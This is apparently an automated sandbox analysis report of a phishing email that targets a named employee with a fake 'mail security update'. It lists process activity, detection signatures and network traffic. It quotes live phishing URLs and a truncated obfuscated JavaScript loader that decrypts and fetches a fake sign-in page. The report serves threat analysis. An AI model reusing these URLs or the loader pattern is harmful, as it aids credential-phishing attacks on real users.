Edit tour

Windows Analysis Report
Murexltd Mail Security Update Required For gjohnson@murexltd.com.msg

Overview

General Information

Sample name:	Murexltd Mail Security Update Required For gjohnson@murexltd.com.msg
Analysis ID:	1499929
MD5:	30fecd626c4847d7896d1dc0e9eca992
SHA1:	64f7974ffe2bd1addf0219565a9eb594ed00d769
SHA256:	774b494a1ddc338f3d5292872dd868c4eb8bc129c545de803fbbfee1d69cb396
Infos:

Detection

HTMLPhisher

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish70

HTML page contains hidden URLs

HTML page contains hidden email address

HTML page contains suspicious javascript code

Phishing site detected (based on shot match)

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML body with high number of embedded images detected

HTML page contains hidden javascript code

HTML title does not match URL

Invalid T&C link found

Queries the volume information (name, serial number etc) of a device

Sigma detected: Office Autorun Keys Modification

Sigma detected: Outlook Security Settings Updated - Registry

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

OUTLOOK.EXE (PID: 1876 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Murexltd Mail Security Update Required For gjohnson@murexltd.com.msg" MD5: 91A5292942864110ED734005B7E005C0)

ai.exe (PID: 6932 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "AE84D475-9D90-4699-AC09-546AA3816293" "D5AC2D48-97CD-47FA-8517-B1F27648D3AF" "1876" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)

Acrobat.exe (PID: 6448 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\QD6UVN5U\New Security Update.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 6728 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 2336 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2276 --field-trial-handle=1596,i,9170700212267717821,16395113202581352541,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

chrome.exe (PID: 1428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://umeleoplodnenie.com/.well-known/tvavx.php?7-797967704b536932307463764b4d3070546b334f4c79704a72556a564b793549544537566a776f6f53537a534277413d-Z2pvaG5zb25AbXVyZXhsdGQuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1928,i,7679209889696324048,15971971168667836464,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://umeleoplodnenie.com/.well-known/tvavx.php?7-797967704b536932307463764b4d3070546b334f4c79704a72556a564b793549544537566a776f6f53537a534277413d-Z2pvaG5zb25AbXVyZXhsdGQuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1172 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 --field-trial-handle=1816,i,15692130149549399329,3202881519042920722,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://privacy.microsoft.com/en-us/privacystatement MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1648,i,18346115663878279960,8781314979337182349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
8.8.pages.csv	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security

Sigma Signatures

Sigma detected: Office Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 1876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Sigma detected: Outlook Security Settings Updated - Registry

Source: Registry Key set

Author: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\QD6UVN5U\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 1876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish70

Source: Yara match

File source: 8.8.pages.csv, type: HTML

HTML page contains hidden URLs

Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: https://infinitipulsarjoy.ru///2846.php
Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: https://infinitipulsarjoy.ru///7488.php

HTML page contains hidden email address

Source: https://umeleoplodnenie.com/.well-known/tvavx.php	HTTP Parser: gjohnson@murexltd.com
Source: https://umeleoplodnenie.com/.well-known/tvavx.php	HTTP Parser: gjohnson@murexltd.com

HTML page contains suspicious javascript code

Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: window.location.href = atob(
Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: window.location.href = atob(

Phishing site detected (based on shot match)

Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	Matcher: Template: captcha matched
Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	Matcher: Template: captcha matched

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: async function earl(iamb) { <!-- a cars beauty lies in the stories it tells. --> var {a,b,c,d} = json.parse(iamb); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- <p>discover yourself on the open road.</p> --> } (async () => { document.write(await earl(await (await fetch(await earl(atob(`eyjhijoia0m0nyt4y2r2vvfqdm5iz0xrmknxvw83whe5d1dhxc9gdwkrbk83mjjbejg9iiwiyyi6ijg5yjhhzwfiogmwmzc3zwuznwe1nmzmnmqxmwizzmuxiiwiyii6imu5otfhmgeznwnkntgwngi1nzfmndu3yzuwndy0mmu4y2rmyzjmztk5zdu3nzy2ndvln2e4y2yxnjhlzmjiztewowy3mtq0n2rkngeyymjintmynwexmge4ntu4mzrlnmvlnjvmmtrjmjjlmzy2mwezmmvlnjlknji4mmixngvmndgwm2i2ytjjngvhymu1ztk3mwy0mmjhnjk2ndeyymuxzjnlndzjote3nzc3m2y5yjy2otk2mzfimde2ngm4ndq0zgq4zdq5ngq0zdyymzcwzgrintg3owe4ywzkndmxmwezmjq2mzqzn2vlnzeymwi3ognimgjjntm3yjk3njk3njjhmtnhmmi5mgi0njhjztg4odnkn2q0mtbkmjy1...
Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: async function earl(iamb) { <!-- a cars beauty lies in the stories it tells. --> var {a,b,c,d} = json.parse(iamb); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- <p>discover yourself on the open road.</p> --> } (async () => { document.write(await earl(await (await fetch(await earl(atob(`eyjhijoia0m0nyt4y2r2vvfqdm5iz0xrmknxvw83whe5d1dhxc9gdwkrbk83mjjbejg9iiwiyyi6ijg5yjhhzwfiogmwmzc3zwuznwe1nmzmnmqxmwizzmuxiiwiyii6imu5otfhmgeznwnkntgwngi1nzfmndu3yzuwndy0mmu4y2rmyzjmztk5zdu3nzy2ndvln2e4y2yxnjhlzmjiztewowy3mtq0n2rkngeyymjintmynwexmge4ntu4mzrlnmvlnjvmmtrjmjjlmzy2mwezmmvlnjlknji4mmixngvmndgwm2i2ytjjngvhymu1ztk3mwy0mmjhnjk2ndeyymuxzjnlndzjote3nzc3m2y5yjy2otk2mzfimde2ngm4ndq0zgq4zdq5ngq0zdyymzcwzgrintg3owe4ywzkndmxmwezmjq2mzqzn2vlnzeymwi3ognimgjjntm3yjk3njk3njjhmtnhmmi5mgi0njhjztg4odnkn2q0mtbkmjy1...

Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: Number of links: 0
Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: Number of links: 0

Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: Total embedded image size: 45708
Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: Total embedded image size: 45708

Source: https://umeleoplodnenie.com/.well-known/tvavx.php

HTTP Parser: Base64 decoded: gjohnson@murexltd.com

Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: Title: Sign in to your account does not match URL
Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: Title: Sign in to your account does not match URL

Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: Invalid link: Other important privacy information
Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: Invalid link: U.S. State Data Privacy
Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: Invalid link: Changes to this privacy statement
Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: Invalid link: Get Help
Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: Invalid link: Other important privacy information
Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: Invalid link: U.S. State Data Privacy
Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: Invalid link: Changes to this privacy statement
Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: Invalid link: Get Help

Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: <input type="password" .../> found
Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: <input type="password" .../> found

Source: https://umeleoplodnenie.com/.well-known/tvavx.php	HTTP Parser: No favicon
Source: https://umeleoplodnenie.com/.well-known/tvavx.php	HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No favicon

Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No <meta name="author".. found
Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No <meta name="author".. found
Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No <meta name="author".. found
Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: No <meta name="author".. found
Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: No <meta name="author".. found

Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No <meta name="copyright".. found
Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No <meta name="copyright".. found
Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29t	HTTP Parser: No <meta name="copyright".. found
Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: No <meta name="copyright".. found
Source: https://privacy.microsoft.com/en-us/privacystatement	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:56244 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53

Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23

Source: global traffic	DNS traffic detected: DNS query: umeleoplodnenie.com
Source: global traffic	DNS traffic detected: DNS query: pulsecortexe.space
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: infinitipulsarjoy.ru
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global traffic	DNS traffic detected: DNS query: c.s-microsoft.com
Source: global traffic	DNS traffic detected: DNS query: assets.onestore.ms
Source: global traffic	DNS traffic detected: DNS query: i.s-microsoft.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: e-fukuyoshi.com
Source: global traffic	DNS traffic detected: DNS query: google.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56317
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56318
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56319
Source: unknown	Network traffic detected: HTTP traffic on port 54221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56313
Source: unknown	Network traffic detected: HTTP traffic on port 56302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56314
Source: unknown	Network traffic detected: HTTP traffic on port 54201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56315
Source: unknown	Network traffic detected: HTTP traffic on port 56322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56286
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56320
Source: unknown	Network traffic detected: HTTP traffic on port 56325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56321
Source: unknown	Network traffic detected: HTTP traffic on port 54224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56322
Source: unknown	Network traffic detected: HTTP traffic on port 54218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56323
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56297
Source: unknown	Network traffic detected: HTTP traffic on port 56291 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56299
Source: unknown	Network traffic detected: HTTP traffic on port 54190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56290
Source: unknown	Network traffic detected: HTTP traffic on port 54230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56291
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54209
Source: unknown	Network traffic detected: HTTP traffic on port 54214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54208
Source: unknown	Network traffic detected: HTTP traffic on port 56252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54200
Source: unknown	Network traffic detected: HTTP traffic on port 54208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54207
Source: unknown	Network traffic detected: HTTP traffic on port 54222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54206
Source: unknown	Network traffic detected: HTTP traffic on port 56309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54205
Source: unknown	Network traffic detected: HTTP traffic on port 56323 -> 443
